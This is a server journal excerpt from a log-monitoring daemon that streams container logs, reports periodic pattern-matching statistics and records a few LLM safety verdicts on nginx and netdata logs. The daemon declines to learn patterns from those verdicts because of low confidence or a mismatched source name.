Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928260 [observer] Pattern store initialized (4 scopes)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928287 [observer] Analyzer pipeline ready
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928391 [notifier] Generated default config at /var/lib/observer/notifications.yaml
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928608 [logwatch] Notifications:
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928623 [logwatch]   ✗ webhook    → not configured (set WEBHOOK_URL)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928627 [logwatch]   ✓ email      → drew@vaultdec.com
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928630 [logwatch]   ✗ sms        → not configured (set TWILIO_SID + ALERT_SMS_TO)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928633 [logwatch]   ✗ push/ios   → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928636 [logwatch]   ✗ push/fcm   → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928853 [observer] Starting container log watcher...
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935124 [watcher] Found 8 running containers
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935230 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935355 [watcher] Streaming logs for srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935493 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935577 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.936719 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.937293 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.938322 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.938563 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 20 00:14:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:32.427067 [observer] LLM inference server connected
Mar 20 00:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:15:01.937878 [observer] Pipeline: processed=4 pattern_hits=4 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:15:01.937910 [observer] Patterns: hash=4 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:15:31.945271 [observer] Pipeline: processed=6 pattern_hits=6 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:15:31.945301 [observer] Patterns: hash=6 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:16:01.970113 [observer] Pipeline: processed=10 pattern_hits=10 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:16:01.970142 [observer] Patterns: hash=10 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:16:31.943935 [observer] Pipeline: processed=12 pattern_hits=12 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:16:31.943964 [observer] Patterns: hash=12 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:17:01.948987 [observer] Pipeline: processed=14 pattern_hits=14 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:17:01.949022 [observer] Patterns: hash=14 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:17:31.934828 [observer] Pipeline: processed=20 pattern_hits=20 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:17:31.934860 [observer] Patterns: hash=20 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:18:01.949104 [observer] Pipeline: processed=22 pattern_hits=22 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:18:01.949133 [observer] Patterns: hash=22 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:18:31.935072 [observer] Pipeline: processed=26 pattern_hits=26 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:18:31.935097 [observer] Patterns: hash=26 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:19:01.949308 [observer] Pipeline: processed=28 pattern_hits=28 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:19:01.949344 [observer] Patterns: hash=28 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:19:31.933575 [observer] Pipeline: processed=32 pattern_hits=32 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:19:31.933599 [observer] Patterns: hash=32 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:20:01.952330 [observer] Pipeline: processed=34 pattern_hits=34 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:20:01.952361 [observer] Patterns: hash=34 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:20:31.951537 [observer] Pipeline: processed=36 pattern_hits=36 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:20:31.951564 [observer] Patterns: hash=36 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:21:01.939795 [observer] Pipeline: processed=40 pattern_hits=40 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:21:01.939859 [observer] Patterns: hash=40 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:21:31.941560 [observer] Pipeline: processed=42 pattern_hits=42 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:21:31.941587 [observer] Patterns: hash=42 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:22:01.943143 [observer] Pipeline: processed=46 pattern_hits=46 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:22:01.943204 [observer] Patterns: hash=46 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:22:31.943474 [observer] Pipeline: processed=50 pattern_hits=50 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:22:31.943502 [observer] Patterns: hash=50 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:23:01.946589 [observer] Pipeline: processed=54 pattern_hits=54 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:23:01.946620 [observer] Patterns: hash=54 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:23:31.935592 [observer] Pipeline: processed=56 pattern_hits=56 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:23:31.935617 [observer] Patterns: hash=56 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:24:01.945273 [observer] Pipeline: processed=58 pattern_hits=58 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:24:01.945300 [observer] Patterns: hash=58 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:24:31.934678 [observer] Pipeline: processed=62 pattern_hits=62 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:24:31.934703 [observer] Patterns: hash=62 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:25:01.948925 [observer] Pipeline: processed=64 pattern_hits=64 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:25:01.948953 [observer] Patterns: hash=64 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:25:31.934483 [observer] Pipeline: processed=68 pattern_hits=68 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:25:31.934508 [observer] Patterns: hash=68 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:26:01.944609 [observer] Pipeline: processed=70 pattern_hits=70 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:26:01.944645 [observer] Patterns: hash=70 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:26:31.933352 [observer] Pipeline: processed=74 pattern_hits=74 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:26:31.933375 [observer] Patterns: hash=74 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:27:01.946692 [observer] Pipeline: processed=76 pattern_hits=76 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:27:01.946823 [observer] Patterns: hash=76 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:27:31.933517 [observer] Pipeline: processed=80 pattern_hits=80 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:27:31.933540 [observer] Patterns: hash=80 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:28:01.944006 [observer] Pipeline: processed=84 pattern_hits=84 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:28:01.944035 [observer] Patterns: hash=84 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:28:31.937021 [observer] Pipeline: processed=86 pattern_hits=86 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:28:31.937044 [observer] Patterns: hash=86 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:29:01.945930 [observer] Pipeline: processed=90 pattern_hits=90 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:29:01.945967 [observer] Patterns: hash=90 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:29:31.943349 [observer] Pipeline: processed=92 pattern_hits=92 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:29:31.943371 [observer] Patterns: hash=92 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:30:01.941530 [observer] Pipeline: processed=96 pattern_hits=96 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:30:01.941559 [observer] Patterns: hash=96 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:30:31.933345 [observer] Pipeline: processed=98 pattern_hits=98 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:30:31.933368 [observer] Patterns: hash=98 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:01.975351 [observer] Pipeline: processed=100 pattern_hits=100 llm_calls=0 llm_errors=0 learned=0
Mar 20 00:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:01.975630 [observer] Patterns: hash=100 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=0
Mar 20 00:31:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:23.238817 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 00:31:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:23.238853 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 00:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:31.934762 [observer] Pipeline: processed=105 pattern_hits=104 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:31:31.934793 [observer] Patterns: hash=104 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1
Mar 20 00:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:32:01.943469 [observer] Pipeline: processed=107 pattern_hits=106 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:32:01.943493 [observer] Patterns: hash=106 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1
Mar 20 00:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:32:31.936725 [observer] Pipeline: processed=113 pattern_hits=112 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:32:31.936922 [observer] Patterns: hash=112 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1
Mar 20 00:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:33:01.936710 [observer] Pipeline: processed=115 pattern_hits=114 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:33:01.936748 [observer] Patterns: hash=114 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1
Mar 20 00:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:33:31.933439 [observer] Pipeline: processed=119 pattern_hits=118 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:33:31.933462 [observer] Patterns: hash=118 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1
Mar 20 00:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:01.960977 [observer] Pipeline: processed=121 pattern_hits=120 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:01.961011 [observer] Patterns: hash=120 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1
Mar 20 00:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:31.948522 [observer] Pipeline: processed=123 pattern_hits=122 llm_calls=1 llm_errors=0 learned=0
Mar 20 00:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:31.948547 [observer] Patterns: hash=122 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=1
Mar 20 00:34:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:43.031338 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 00:34:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:43.031380 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 00:34:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:47.495689 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 00:34:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:47.495728 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 00:34:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:53.292354 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 00:34:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:34:53.292401 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 00:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:35:01.947953 [observer] Pipeline: processed=130 pattern_hits=126 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:35:01.947979 [observer] Patterns: hash=126 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:35:31.935714 [observer] Pipeline: processed=132 pattern_hits=128 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:35:31.935743 [observer] Patterns: hash=128 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:36:01.949697 [observer] Pipeline: processed=136 pattern_hits=132 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:36:01.949724 [observer] Patterns: hash=132 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:36:31.935120 [observer] Pipeline: processed=138 pattern_hits=134 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:36:31.935146 [observer] Patterns: hash=134 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:37:01.949936 [observer] Pipeline: processed=142 pattern_hits=138 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:37:01.949977 [observer] Patterns: hash=138 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:37:31.937850 [observer] Pipeline: processed=144 pattern_hits=140 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:37:31.937877 [observer] Patterns: hash=140 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:38:01.952984 [observer] Pipeline: processed=148 pattern_hits=144 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:38:01.953017 [observer] Patterns: hash=144 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:38:31.934566 [observer] Pipeline: processed=152 pattern_hits=148 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:38:31.934595 [observer] Patterns: hash=148 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:39:01.957823 [observer] Pipeline: processed=154 pattern_hits=150 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:39:01.957855 [observer] Patterns: hash=150 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:39:31.933527 [observer] Pipeline: processed=158 pattern_hits=154 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:39:31.933551 [observer] Patterns: hash=154 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:40:01.939218 [observer] Pipeline: processed=160 pattern_hits=156 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:40:01.939248 [observer] Patterns: hash=156 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:40:31.934253 [observer] Pipeline: processed=164 pattern_hits=160 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:40:31.934276 [observer] Patterns: hash=160 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:41:01.955802 [observer] Pipeline: processed=166 pattern_hits=162 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:41:01.955829 [observer] Patterns: hash=162 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:41:31.952688 [observer] Pipeline: processed=168 pattern_hits=164 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:41:31.952714 [observer] Patterns: hash=164 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:42:01.937973 [observer] Pipeline: processed=172 pattern_hits=168 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:42:01.938000 [observer] Patterns: hash=168 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:42:31.934480 [observer] Pipeline: processed=174 pattern_hits=170 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:42:31.934503 [observer] Patterns: hash=170 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:43:01.944699 [observer] Pipeline: processed=180 pattern_hits=176 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:43:01.944725 [observer] Patterns: hash=176 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:43:31.943108 [observer] Pipeline: processed=182 pattern_hits=178 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:43:31.943134 [observer] Patterns: hash=178 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:44:01.968749 [observer] Pipeline: processed=186 pattern_hits=182 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:44:01.969029 [observer] Patterns: hash=182 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:44:31.934875 [observer] Pipeline: processed=188 pattern_hits=184 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:44:31.934898 [observer] Patterns: hash=184 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:45:01.991953 [observer] Pipeline: processed=190 pattern_hits=186 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:45:01.991991 [observer] Patterns: hash=186 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:45:31.934014 [observer] Pipeline: processed=194 pattern_hits=190 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:45:31.934040 [observer] Patterns: hash=190 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:46:01.961130 [observer] Pipeline: processed=196 pattern_hits=192 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:46:01.961171 [observer] Patterns: hash=192 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:46:31.934478 [observer] Pipeline: processed=200 pattern_hits=196 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:46:31.934505 [observer] Patterns: hash=196 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:47:01.949272 [observer] Pipeline: processed=202 pattern_hits=198 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:47:01.949326 [observer] Patterns: hash=198 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
